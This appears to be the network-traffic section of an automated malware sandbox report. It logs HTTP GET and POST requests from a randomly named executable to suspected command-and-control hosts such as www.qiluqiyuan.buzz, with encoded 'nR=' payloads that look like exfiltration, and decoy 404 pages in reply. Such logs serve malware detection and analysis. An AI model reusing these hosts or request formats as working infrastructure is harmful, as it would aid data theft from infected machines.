                    Data Ascii: nR=2iJzcjLeEdvuEP0sXP8GmEc+vyxuhWMTtPJ6DobN5iq0l13f+iMAJ2QcbiSscESYinFQob1YePClL21V+fCq0OBZN6Ke1Mkm1on/Gvl9aOOvrAFTjN/8RZvt9G11k0S2LlFdAEfkmc5jy3WhZ7IMIq4wLjfB1M6J3PCZM1IJY4Ra7biEknLHqRszoe9UNrSBamCxFVFuRuagUWhB1w9fBU7Mp5rPw9G5pZynqQGiZ6ozpnpotD5vwPPRVlAdRdQzzlmFkRc/UBSHNW0QIH0ZopYuGKdzp8kmT9359eyZV6hixDtIh5L+CUEGsHbl/NflFM0bZV5NWt5jh19Qj5EpFr97y4eKU+FB5zVOIk8rVfAf9EKYQriv6U4mZiRW5Rp7//1SSU+v+UaSEMbHyXOa1IR33WxrbwknakN081UuQxRPZIUn5Z6B0FEosdxpnw2gOFVwZBgLSPzOGdbnw34YUlOSmaHvHb3H/vFerKPTiWyUqOIe/mzWArz0F83Lj0/qxU3UT0y0lAW9xnsG8sGj6mYDxPuHjTBSQs65sIoYmnuM9McidoE5lA0McUw4gtQVD+HH+cZ/4+leGYt0A33X3Qz7Rsqgd7i+rp0hmdwJTtFEdZHuVIZNUF2J18ZKJkF8QU5FA9oqvcsM0S7sjK8jJTU8ZVVfuVI6PPxPb+WVI+hkB4ZG+VgzfR98vM0OhqgmQ6jhue6tgunewok+Gl9OWeKrAI+oQ+jyEXAr0fvX4nQhzoGLECl3JhybNO+fft4CGkdUNE1ODYYsc/zFK84hv0b4Q9cDmFgMPbzRW7c1IZe1WlncUlz1GWUftSVvjSykqto4l1YaouZRkHqyt26oIMgmT6fk8SbiNU90cHvXegXUM6KhKH0bD/gxYriJZTPl1osZLVwlsHjZjnZYV98poPJDvnNs8QEM4dDfGFF4IveSoO1P+l+KQl+q9uyCayaIEJOdKnStv8RHIwEUmJYRvzRwfdU2SEG6KQSaLODmUo4orae8e [TRUNCATED]
                    Sep 12, 2024 13:04:02.708224058 CEST658INHTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:04:02 GMT
                    Server: Apache
                    Content-Length: 514
                    Connection: close
                    Content-Type: text/html
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    20192.168.2.549733203.161.43.228804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:04:04.653492928 CEST457OUTGET /ftr3/?nR=7ghTfXuNFdv7bt0fQ6dp+VYKrg9F0VottJoldp68xQSgk3fAwjETInI5bmz0SHizsmBfpbcRVbCgLhFU68m+g+0qN5CZ17IzjLi3DtoRUNuK8DdWmd+CTazIxVVgqHT8dA==&OJ=btRp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Language: en-US,en
                    Host: www.quilo.life
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Sep 12, 2024 13:04:05.250320911 CEST673INHTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:04:05 GMT
                    Server: Apache
                    Content-Length: 514
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    21192.168.2.549734161.97.168.245804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:04:10.488035917 CEST733OUTPOST /wjff/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.qiluqiyuan.buzz
                    Origin: http://www.qiluqiyuan.buzz
                    Referer: http://www.qiluqiyuan.buzz/wjff/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 203
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 31 49 39 71 4e 58 37 56 4c 47 44 72 52 4d 43 66 79 5a 38 61 44 63 48 4b 35 4e 4e 2b 46 37 65 32 6b 70 4f 6d 34 4c 42 49 66 42 78 4e 47 33 4f 30 43 65 7a 74 35 52 47 38 6d 50 4e 71 44 54 62 46 41 78 70 59 6c 79 2f 4d 67 45 43 59 43 51 6e 39 75 35 74 50 46 65 59 45 4f 4b 74 2f 47 2b 77 56 30 33 43 30 78 51 57 66 50 44 74 31 77 2f 7a 70 33 39 2b 35 61 74 31 6a 30 49 42 52 45 34 36 49 6a 38 54 34 6e 74 7a 6f 41 53 7a 6a 42 54 37 79 77 68 62 47 44 50 77 6f 47 4a 38 57 48 49 77 38 59 68 4e 44 47 7a 48 71 7a 58 69 30 6c 79 4e 67 37 54 2f 55 56 31 4d 2b 6a 43 5a 53 64 4d 39 71 73 6f 54 6d 70 65 77 3d
                    Data Ascii: nR=1I9qNX7VLGDrRMCfyZ8aDcHK5NN+F7e2kpOm4LBIfBxNG3O0Cezt5RG8mPNqDTbFAxpYly/MgECYCQn9u5tPFeYEOKt/G+wV03C0xQWfPDt1w/zp39+5at1j0IBRE46Ij8T4ntzoASzjBT7ywhbGDPwoGJ8WHIw8YhNDGzHqzXi0lyNg7T/UV1M+jCZSdM9qsoTmpew=
                    Sep 12, 2024 13:04:11.080820084 CEST1236INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:04:10 GMT
                    Content-Type: text/html; charset=utf-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    ETag: W/"66cd104a-b96"
                    Content-Encoding: gzip
                    Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                    Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                    Sep 12, 2024 13:04:11.080848932 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                    Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    22192.168.2.549735161.97.168.245804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:04:13.034251928 CEST753OUTPOST /wjff/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.qiluqiyuan.buzz
                    Origin: http://www.qiluqiyuan.buzz
                    Referer: http://www.qiluqiyuan.buzz/wjff/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 223
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 31 49 39 71 4e 58 37 56 4c 47 44 72 51 74 79 66 2f 61 45 61 4c 63 48 4e 38 4e 4e 2b 53 72 65 79 6b 6f 79 6d 34 4c 6f 4e 63 7a 6c 4e 47 56 6d 30 44 63 4c 74 30 78 47 38 74 76 4e 56 4f 7a 62 61 41 78 73 37 6c 77 62 4d 67 46 6d 59 43 53 76 39 75 75 5a 41 45 4f 59 43 47 71 74 39 49 65 77 56 30 33 43 30 78 51 53 78 50 44 6c 31 7a 4f 44 70 77 70 69 34 57 4e 31 67 7a 49 42 52 58 6f 36 4d 6a 38 54 4f 6e 73 2f 4f 41 58 76 6a 42 54 4c 79 77 77 62 48 4a 50 77 78 43 4a 39 58 58 39 56 74 66 6d 74 71 43 77 6e 6a 76 55 6d 69 74 6b 67 4b 68 78 33 38 47 56 67 47 7a 52 52 6c 4d 38 63 44 32 4c 44 57 33 4a 6b 32 53 77 37 30 49 76 32 67 71 30 4c 5a 64 61 6c 79 6a 59 55 2f
                    Data Ascii: nR=1I9qNX7VLGDrQtyf/aEaLcHN8NN+Sreykoym4LoNczlNGVm0DcLt0xG8tvNVOzbaAxs7lwbMgFmYCSv9uuZAEOYCGqt9IewV03C0xQSxPDl1zODpwpi4WN1gzIBRXo6Mj8TOns/OAXvjBTLywwbHJPwxCJ9XX9VtfmtqCwnjvUmitkgKhx38GVgGzRRlM8cD2LDW3Jk2Sw70Iv2gq0LZdalyjYU/
                    Sep 12, 2024 13:04:14.479947090 CEST1236INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:04:13 GMT
                    Content-Type: text/html; charset=utf-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    ETag: W/"66cd104a-b96"
                    Content-Encoding: gzip
                    Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                    Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                    Sep 12, 2024 13:04:14.480197906 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                    Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L
                    Sep 12, 2024 13:04:14.480438948 CEST1236INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:04:13 GMT
                    Content-Type: text/html; charset=utf-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    ETag: W/"66cd104a-b96"
                    Content-Encoding: gzip
                    Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                    Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                    Sep 12, 2024 13:04:14.481065989 CEST1236INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:04:13 GMT
                    Content-Type: text/html; charset=utf-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    ETag: W/"66cd104a-b96"
                    Content-Encoding: gzip
                    Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                    Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    23192.168.2.549736161.97.168.245804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:04:15.577953100 CEST1770OUTPOST /wjff/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.qiluqiyuan.buzz
                    Origin: http://www.qiluqiyuan.buzz
                    Referer: http://www.qiluqiyuan.buzz/wjff/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 1239
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 31 49 39 71 4e 58 37 56 4c 47 44 72 51 74 79 66 2f 61 45 61 4c 63 48 4e 38 4e 4e 2b 53 72 65 79 6b 6f 79 6d 34 4c 6f 4e 63 7a 64 4e 47 6d 65 30 43 37 66 74 31 78 47 38 75 76 4e 75 4f 7a 62 58 41 31 42 79 6c 77 57 78 67 48 75 59 44 78 33 39 2b 4d 78 41 4f 4f 59 43 45 71 74 34 47 2b 78 58 30 7a 65 77 78 51 43 78 50 44 6c 31 7a 4d 62 70 6a 64 2b 34 51 4e 31 6a 30 49 42 64 45 34 37 62 6a 39 36 37 6e 73 37 34 41 6b 33 6a 42 7a 62 79 7a 47 33 48 55 2f 77 6b 46 4a 38 45 58 39 51 31 66 6e 46 49 43 78 53 2b 76 55 75 69 39 51 74 52 6b 79 54 56 58 54 41 61 34 67 4e 6b 51 5a 74 6d 38 72 37 54 2f 61 4e 51 4f 6a 7a 30 4c 61 2b 32 6d 78 69 78 44 2b 35 30 75 76 70 4a 30 75 64 32 39 65 49 62 46 35 4d 78 58 56 6f 38 6c 37 78 6a 49 78 63 66 2b 74 42 74 57 68 6d 64 73 75 70 45 5a 6d 64 50 61 35 71 65 4f 77 73 74 75 34 37 35 33 63 48 65 30 68 74 79 6a 47 62 69 50 32 51 6f 42 62 56 67 41 46 68 52 45 65 65 33 62 6c 66 39 77 4e 45 42 31 55 59 36 6d 72 33 52 79 39 65 2f 78 59 7a 65 62 4e 32 52 76 43 48 59 39 6d 70 [TRUNCATED]
                    Data Ascii: nR=1I9qNX7VLGDrQtyf/aEaLcHN8NN+Sreykoym4LoNczdNGme0C7ft1xG8uvNuOzbXA1BylwWxgHuYDx39+MxAOOYCEqt4G+xX0zewxQCxPDl1zMbpjd+4QN1j0IBdE47bj967ns74Ak3jBzbyzG3HU/wkFJ8EX9Q1fnFICxS+vUui9QtRkyTVXTAa4gNkQZtm8r7T/aNQOjz0La+2mxixD+50uvpJ0ud29eIbF5MxXVo8l7xjIxcf+tBtWhmdsupEZmdPa5qeOwstu4753cHe0htyjGbiP2QoBbVgAFhREee3blf9wNEB1UY6mr3Ry9e/xYzebN2RvCHY9mpyEnmN0n2nmDczAeGzySG1zQd2HOYKjVEnoVBh9Je70bU40tx+QnsckfnGvWvBd5XC5lGDc9TIB9LDqmhBV5eJ0925Q1qvDDKm/VF3zoWp5DliNXrX9IVIw0ztkDERcL2KWnzCtUbleoQiILJWGgOzGJ+C4hnT8/Z7RZvU/HHy6QXgIelGXBitoGcQut6dNluDwEuDnV0NAJCJbBNImZ5fgPMWmzkbHqEqvEXmPkHcDyePKTYDv1St2i5+hrpt7lkx1xP98QBbgqK5GMjKjUuyxVQF22myG5KSCgTJdzxVatiLnZw3LRuPyRuQ13oe7B2H4QbvPj/CYd7/qzVyvz+nNn4gI2NOIyzllEi0KlPobz/aipCDIqtAEQXCZ1TosOrcU1Jd5rTOhXs9wKEoXbd+YSc3Bdt3SaHyd/uGZKwkudCM3of9MTgnMHjuxe2dky0g37EV+kogyKybnnlcTVvHdZy+9Qm2difLxF7Upj6J+vba3KyQA88loB8ew6dV4PGRz2aoLBvPMAPO32++ERBjbEaU7Gftcim6apcQvV1VCF74anBctzc5U8SRyRVfda5SOLz3WQbwpyhOWGnCVN6+1CYfEeDT89BHJjWewbuFkmW/OLfol3RT4t6fCzs+LU/AD+lLbp1GzuefG2vTK2p9wpdDho3Pfj1xG [TRUNCATED]
                    Sep 12, 2024 13:04:16.180771112 CEST1236INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:04:16 GMT
                    Content-Type: text/html; charset=utf-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
